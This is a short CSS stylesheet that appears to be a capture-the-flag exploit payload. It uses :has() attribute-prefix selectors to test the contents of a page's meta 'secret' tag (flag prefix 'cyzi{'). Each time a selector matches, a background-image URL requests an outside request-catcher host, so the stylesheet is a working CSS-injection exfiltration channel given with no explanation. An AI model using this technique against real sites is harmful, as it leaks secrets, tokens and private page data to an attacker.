:root {
    --bg: yellow;
    --text: black;
    --primary: blue;
    --secondary: gray;
    --border: lightgray;
    --red: red;
    --blue: blue;
}

html:has(meta[name=secret][content^="cyzi{"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=HTTP_OK);
}

html:has(meta[name=secret][content^="cyzi{"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=HTTPS_OK);
}

html:has(meta[name=secret][content^="nah... y"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=HTTP_TEST_OK);
}

html:has(meta[name=secret][content^="nah... y"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=HTTPS_TEST_OK);
}


